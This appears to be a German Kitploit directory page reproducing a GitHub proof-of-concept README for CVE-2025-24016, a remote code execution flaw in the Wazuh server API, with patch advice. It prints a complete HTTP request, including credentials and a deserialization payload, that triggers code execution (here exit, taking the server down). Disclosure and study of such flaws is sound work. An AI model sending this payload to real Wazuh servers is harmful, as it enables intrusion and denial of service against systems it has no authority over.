Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
CVE-2025-24016 — CVE-2025-24016: RCE in Wazuh server! Remote-Codeausführung | Kitploit
Tools/GitHubGitHub/muhammadwaseem29/cve-2025-24016
SchwachstellenanalyseExploitationWebanwendungs-ExploitationPenetrationstestsRemote-Access-ToolPayload-Entwicklung
GitHubmuhammadwaseem29/cve-2025-24016

CVE-2025-24016

CVE-2025-24016: RCE in Wazuh server! Remote-Codeausführung

Repository anzeigen
5vor 1 JahrNoch nicht geprüft

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen
Webseite

Wazuh Remote Code Execution (RCE) - PoC

Überblick über die Schwachstelle

Dieses Repository demonstriert die Remote-Code-Execution-Schwachstelle (RCE) im Wazuh-Server, die durch eine unsichere Deserialisierung im Paket wazuh-manager eingeführt wird. Die Schwachstelle ermöglicht es entfernten Angreifern mit API-Zugriff (kompromittiertes Dashboard, Wazuh-Server im Cluster oder bestimmte Konfigurationen mit kompromittierten Agents), beliebigen Code auf dem Server auszuführen.

Betroffene Versionen

  • wazuh-manager Version >= 4.4.0
  • In Version >= 4.9.1 gepatcht

Beschreibung

Die Schwachstelle tritt in der Wazuh-API auf, wo Parameter im DistributedAPI als JSON serialisiert und mithilfe von as_wazuh_object in der Datei framework/wazuh/core/cluster/common.py deserialisiert werden. Ein Angreifer kann diese Schwachstelle ausnutzen, indem er ein nicht bereinigtes Wörterbuch in DAPI-Anfragen einschleust, was zur Auswertung von beliebigem Python-Code führen kann.

Die RCE kann über den Endpunkt run_as ausgelöst werden, der es dem Angreifer erlaubt, das Argument auth_context zu kontrollieren. Durch das Erstellen einer bösartigen Anfrage kann beliebiger Code auf dem Master-Server ausgeführt werden.

Proof of Concept

Um diese Schwachstelle über die Server-API auszulösen, führen Sie die folgenden Schritte aus.

PoC-Burp-Suite-Anfrage

  1. Burp-Suite-Anfrage zum Auslösen der Schwachstelle:
root@kitploit:~
POST /security/user/authenticate/run_as HTTP/1.1
Host: target.com:55000
Cache-Control: max-age=0
Accept-Language: en-US
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.6478.183 Safari/537.36
Accept: application/json
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Authorization: Basic d2F6dXcta3dpTUltUzNjcjM3UDA1MHItOg==  # Base64-encoded "wazuh-wui:MyS3cr37P450r.*-"
Content-Type: application/json
Content-Length: 83

{
  "__unhandled_exc__": {
    "__class__": "exit",
    "__args__": []
  }
}

Lösungsbild

  1. Erklärung der Anfrage:
  • Authorization-Header: Dies ist die Base64-kodierte Autorisierung (wazuh-wui:MyS3cr37P450r.*-).
  • Payload: Der bösartige Payload enthält die nicht bereinigte Ausnahme __unhandled_exc__, die die Ausführung von beliebigem Python-Code (exit in diesem Fall) auslöst.

Auswirkungen

  • Remote Code Execution (RCE): Diese Schwachstelle ermöglicht es Angreifern, beliebigen Code auf dem Wazuh-Server auszuführen. Betroffen sind Versionen >= 4.4.0 bis 4.9.0 (noch nicht gepatcht).
  • Möglicher Denial of Service: In diesem PoC wird die Funktion exit ausgelöst, was dazu führt, dass der Wazuh-Server heruntergefahren wird.

Gegenmaßnahmen

Zum Schutz Ihrer Systeme aktualisieren Sie auf Wazuh Version >= 4.9.1, in der dieses Problem behoben ist.

Tool herunterladen